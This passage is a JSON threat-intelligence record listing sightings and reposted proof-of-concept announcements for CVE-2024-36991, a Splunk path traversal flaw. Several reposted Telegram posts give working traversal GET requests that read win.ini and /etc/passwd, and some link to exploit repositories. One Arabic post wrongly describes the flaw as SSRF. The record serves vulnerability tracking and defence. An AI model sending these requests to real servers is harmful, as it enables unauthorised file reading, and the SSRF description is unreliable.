{"vulnerability": "CVE-2024-36991", "sightings": [{"uuid": "33f02729-a5a8-4753-a569-e4608da17599", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "46765e74-0325-47a6-a54f-e43583055afe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "4a58dca3-5bcd-4d61-9ab4-11dffd654d40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "69ec30aa-2207-44ed-b3c9-063bde080aa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "02f06b66-0c6a-4171-994a-d81d51534353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "fc049760-aa43-438a-bc31-02b118f33cee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-09-10T07:47:56.000000Z"}, {"uuid": "5be242b2-a61b-4c33-a585-7ff1c21be8d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-08-10T18:27:44.000000Z"}, {"uuid": "f091c5f8-c07e-4427-988a-d998cede4c85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "https://bsky.app/profile/rexkyris.bsky.social/post/3lxnk2caous2p", "content": "", "creation_timestamp": "2025-08-30T21:42:12.957099Z"}, {"uuid": "4f83d2d0-029c-481d-9003-04ea71e59c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfbkl44vos2x", "content": "", "creation_timestamp": "2026-02-20T07:11:44.003715Z"}, {"uuid": "f49aa3d9-088a-4469-b823-789cc6a1bf37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7885", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-36991: Will attempt to read Splunk /etc/passwd file\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-36991\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-06T00:54:38.000000Z"}, {"uuid": "bbad8687-15ae-4297-a300-305c52102276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7888", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-36991: Path traversal that affects Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10\nURL\uff1ahttps://github.com/th3gokul/CVE-2024-36991\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-06T15:51:16.000000Z"}, {"uuid": "4aecac0e-9ab6-481d-b138-e12f7589cced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/cKure/13269", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 PoC for CVE-2024-36991: This exploit will attempt to read Splunk /etc/passwd file.\n\nhttps://github.com/bigb0x/CVE-2024-36991", "creation_timestamp": "2024-07-12T02:03:25.000000Z"}, {"uuid": "8160d65b-3d83-4140-9117-24408706e855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/4i6s3KfgWVh_DHJQiP6LOg4zOt9ZFvgpOgBykl90WfOOGjE", "content": "", "creation_timestamp": "2025-07-06T09:00:05.000000Z"}, {"uuid": "971898fa-00e7-4608-b391-5e98b315062c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/11767", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-07T12:27:09.000000Z"}, {"uuid": "b3ed818a-5c7f-4e3f-b7df-799164d6cf88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/ZFIen287iSvZiRFjAWLrPXmFw1-8T2ZoBZdpp1iPhBx88g", "content": "", "creation_timestamp": "2024-07-07T12:50:34.000000Z"}, {"uuid": "003e6577-76e1-46c9-ba6d-d77312563dc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/malwaremanzero/121", "content": "CVE-2024-36991 \u062f\u064a \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0627\u0643\u062a\u0634\u0641\u0648\u0647\u0627 \u0641\u064a \u0628\u0639\u0636 \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0645\u0646 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0648\u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u063a\u0644 \u0636\u0639\u0641 \u0641\u064a \u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u062c\u0627\u0646\u0628\u064a\u0629 SSRF \u0623\u0648 Server-Side Request Forgery \u0627\u0644\u0640 SSRF \u062f\u064a \u062a\u0642\u0646\u064a\u0629 \u0628\u064a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u0639\u0634\u0627\u0646 \u064a\u062a\u062d\u0643\u0645\u0648\u0627 \u0641\u064a \u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0639\u0646 \u0628\u064f\u0639\u062f \u0648\u062f\u0647 \u0628\u064a\u0633\u0645\u062d \u0644\u0647\u0645 \u0625\u0646\u0647\u0645 \u064a\u0646\u0641\u0630\u0648\u0627 \u0637\u0644\u0628\u0627\u062a \u0645\u0634 \u0645\u0635\u0631\u062d \u0628\u0647\u0627 \u0644\u0645\u0648\u0627\u0631\u062f \u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062e\u0627\u0631\u062c\u064a\u0629 \u0645\u0646 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u0647\u0627\u0643\u0631 \u0628\u064a\u0642\u062f\u0631 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u0647\u062c\u0645\u0627\u062a \u0639\u0634\u0627\u0646 \u064a\u0642\u062a\u062d\u0645 \u0634\u0628\u0643\u0627\u062a \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0623\u0648 \u064a\u0633\u0631\u0642 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0623\u0648 \u064a\u0646\u0641\u0630 \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631 \u0639\u0644\u0649 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0627\u0644\u0647\u062f\u0641 \u0645\u0646 CVE-2024-36991 \u0647\u0648 \u062a\u0648\u0636\u064a\u062d \u0625\u0632\u0627\u064a \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0628\u064a\u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647 \u0648\u062e\u0637\u0648\u0631\u062a\u0647 \u0627\u0644\u0643\u0628\u064a\u0631\u0629 \u0625\u0632\u0627\u064a\u061f \u064a\u0639\u0646\u064a \u0627\u0644\u0647\u0627\u0643\u0631 \u0628\u064a\u0642\u062f\u0631 \u064a\u0628\u0639\u062a \u0637\u0644\u0628 HTTP \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0628\u062f\u0644 \u0645\u0627 \u064a\u0628\u0639\u062a \u0645\u0646 \u062c\u0647\u0627\u0632\u0647 \u0627\u0644\u0634\u062e\u0635\u064a \u0648\u062f\u0647 \u0628\u064a\u062e\u0641\u064a \u0647\u0648\u064a\u062a\u0647 \u0648\u0628\u064a\u0635\u0639\u0628 \u062a\u062a\u0628\u0639\u0647 \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u0647\u062c\u0645\u0627\u062a \u0628\u064a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0636\u0639\u0641 \u0641\u064a \u0622\u0644\u064a\u0629 \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u062d\u0629 \u0627\u0644\u0639\u0646\u0627\u0648\u064a\u0646 URLs \u0623\u0648 \u0639\u062f\u0645 \u062a\u0641\u0639\u064a\u0644 \u0642\u064a\u0648\u062f \u0635\u0627\u0631\u0645\u0629 \u0639\u0644\u0649 \u0627\u0644\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0648\u0627\u0631\u062f\u0629 CVE-2024-36991 \u0645\u0645\u0643\u0646 \u062a\u0633\u062a\u062e\u062f\u0645 \u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0632\u064a \u0645\u0641\u0627\u062a\u064a\u062d API \u0623\u0648 \u0623\u0643\u0648\u0627\u062f \u0627\u0644\u062f\u062e\u0648\u0644 \u0644\u0644\u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062d\u062a\u0649 \u062a\u0646\u0641\u064a\u0630 \u0623\u0643\u0648\u0627\u062f \u062e\u0628\u064a\u062b\u0629 \u062c\u0648\u0647 \u0627\u0644\u0634\u0628\u0643\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629 \u0628\u0645\u062c\u0631\u062f \u0645\u0627 \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0647\u0627\u0643\u0631 \u0628\u064a\u0642\u062f\u0631 \u064a\u062a\u062d\u0643\u0645 \u0641\u064a \u062a\u062f\u0641\u0642 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0628\u064a\u0646 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0648\u0627\u0644\u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u062a\u0627\u0646\u064a\u0629 \u0648\u062f\u0647 \u0628\u064a\u062f\u064a\u0647 \u0641\u0631\u0635\u0629 \u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0623\u0646\u0638\u0645\u0629 \u0623\u0643\u062a\u0631 \u0623\u0648 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0623\u0643\u062a\u0631 \u062d\u0633\u0627\u0633\u064a\u0629 \u0643\u0645\u0627\u0646 \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0644\u062a\u0646\u0641\u064a\u0630 \u0647\u062c\u0645\u0627\u062a DDoS \u0623\u0648 Distributed Denial of Service \u0639\u0646 \u0637\u0631\u064a\u0642 \u0625\u063a\u0631\u0627\u0642 \u0627\u0644\u0646\u0638\u0627\u0645 \u0628\u0637\u0644\u0628\u0627\u062a \u0645\u062a\u0643\u0631\u0631\u0629 \u0644\u062d\u062f \u0645\u0627 \u064a\u0639\u0637\u0644\u0647 \u0639\u0644\u0634\u0627\u0646 \u0643\u062f\u0647 \u0645\u062f\u064a\u0631\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0645\u0647\u0646\u062f\u0633\u064a \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0644\u0627\u0632\u0645 \u064a\u062a\u0623\u0643\u062f\u0648\u0627 \u0625\u0646\u0647\u0645 \u0628\u064a\u062d\u062f\u062b\u0648\u0627 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0648\u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0644\u0622\u062e\u0631 \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u0639\u0627\u0644\u062c \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0648\u0643\u0645\u0627\u0646 \u0644\u0627\u0632\u0645 \u064a\u0641\u0639\u0644\u0648\u0627 \u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0636\u0631\u0648\u0631\u064a\u0629 \u0632\u064a \u0641\u062d\u0635 \u0627\u0644\u0639\u0646\u0627\u0648\u064a\u0646 URLs \u0648\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u0644\u0627\u062d\u064a\u062a\u0647\u0627 \u0648\u062a\u0642\u064a\u064a\u062f \u0627\u0644\u0648\u0635\u0648\u0644 \u0644\u0644\u0645\u0648\u0627\u0631\u062f \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0648\u0639\u062f\u0645 \u0627\u0644\u062b\u0642\u0629 \u0641\u064a \u0627\u0644\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0648\u0627\u0631\u062f\u0629 \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u0645\u0634 \u0645\u0648\u062b\u0648\u0642\u0629 \u0627\u0644\u0647\u0627\u0643\u0631 \u0627\u0644\u0645\u062d\u062a\u0631\u0641 \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0639\u0634\u0627\u0646 \u064a\u062d\u0642\u0642 \u0623\u0647\u062f\u0627\u0641 \u0643\u062a\u064a\u0631\u0629 \u0632\u064a \u0633\u0631\u0642\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u062a\u0639\u0637\u064a\u0644 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0623\u0648 \u062d\u062a\u0649 \u0625\u0639\u062f\u0627\u062f \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631 \u0648\u0623\u0639\u0642\u062f \u0644\u0627\u0632\u0645 \u0646\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0628\u062c\u062f\u064a\u0629 \u0643\u0627\u0645\u0644\u0629 \u0644\u0625\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0645\u0645\u0643\u0646 \u064a\u0624\u062f\u064a \u0644\u062e\u0633\u0627\u0626\u0631 \u0643\u0628\u064a\u0631\u0629 \u0641\u064a \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0648\u062a\u0648\u0642\u0641 \u0627\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0645\u0647\u0645\u0629 \u0648\u0643\u0645\u0627\u0646 \u062a\u0623\u062b\u064a\u0631 \u0633\u0644\u0628\u064a \u0639\u0644\u0649 \u0633\u0645\u0639\u0629 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0648\u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0639\u0631\u0636 \u0644\u0644\u0647\u062c\u0648\u0645 \u0641\u064a \u0627\u0644\u0646\u0647\u0627\u064a\u0629 \u0646\u0642\u062f\u0631 \u0646\u0642\u0648\u0644 \u0625\u0646 CVE-2024-36991 \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u062e\u0637\u064a\u0631\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0637\u0644\u0628 \u0648\u0639\u064a \u062a\u0642\u0646\u064a \u0639\u0627\u0644\u064a \u0648\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u0635\u0627\u0631\u0645\u0629 \u0639\u0634\u0627\u0646 \u0646\u0645\u0646\u0639 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0648\u0646\u062d\u0645\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0644\u0634\u0628\u0643\u0627\u062a \u0645\u0646 \u0627\u0644\u062a\u0647\u062f\u064a\u062f\u0627\u062a \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0632\u064a\u062f \u064a\u0648\u0645 \u0628\u0639\u062f \u064a\u0648\u0645\n\n\u0631\u0627\u0628\u0637 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644", "creation_timestamp": "2024-07-21T22:52:36.000000Z"}, {"uuid": "4828712f-6985-4bd3-a9d9-ac27721a5e78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1644", "content": "\ud83d\udea8PoC RELEASED\ud83d\udea8POC for CVE-2024-36991: This exploit will attempt to read Splunk /etc/passwd file.\n\nhttps://x.com/DarkWebInformer/status/1810303232775700641", "creation_timestamp": "2024-07-08T15:24:45.000000Z"}, {"uuid": "ff681158-83e1-40cf-86f4-fa5ac27c22e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1183", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-07T12:27:09.000000Z"}, {"uuid": "5f1a79be-2563-4b01-9db6-85489c1b8538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/6999", "content": "\u200aCritical Splunk Vulnerability Exploited Using Crafted GET Commands\n\nhttps://cybersecuritynews.com/critical-splunk-vulnerability-cve-2024-36991-exploit/", "creation_timestamp": "2024-07-23T10:41:53.000000Z"}, {"uuid": "c76c0439-892a-4430-ae2d-b558e8dc5b14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/YYbp8A9GMf8S2ZHygr8s4p3ZiOzWHZG8LUtOUPbma0fC_9Yx", "content": "", "creation_timestamp": "2024-07-13T23:43:32.000000Z"}, {"uuid": "7500735b-8405-4859-b7ca-b932a27d371e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/756", "content": "POC for Splunk CVE-2024-36991\nhttps://github.com/bigb0x/CVE-2024-36991", "creation_timestamp": "2024-07-06T11:33:13.000000Z"}, {"uuid": "17285d2b-237f-47b6-a9d4-fb5d58f093b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/396", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T02:46:52.000000Z"}, {"uuid": "b9fc662c-da0c-4e27-aa2f-485061bf99f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/391", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-13T13:25:46.000000Z"}, {"uuid": "3db5b427-2eef-41e2-828e-388d8c9a1617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/Tf7RAmO5ucsEOjBgsAIXqXRYfzXLNzHzE3kkLB18s4bauF0", "content": "", "creation_timestamp": "2025-03-31T05:00:07.000000Z"}, {"uuid": "29a7b43a-ed9d-4f32-8056-9bdeb6863a98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/TJyTqjGuKoeyQsqJBRghKspB6mZD1yySHXwgvIUIoB3qUVs", "content": "", "creation_timestamp": "2025-03-31T11:00:06.000000Z"}, {"uuid": "1dc0cde4-870b-43f4-af12-c74d083231b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/eVE5YmoRFUZV8c7TTGPUWrAfKBs48EKz-_YLWjtS9xYVJuE", "content": "", "creation_timestamp": "2025-03-30T23:00:06.000000Z"}, {"uuid": "eb51a57d-053c-42a1-a0cd-af213f5115bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8212", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "18d673d5-4773-4620-9a87-63e690120ba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3405", "content": "Tools - Hackers 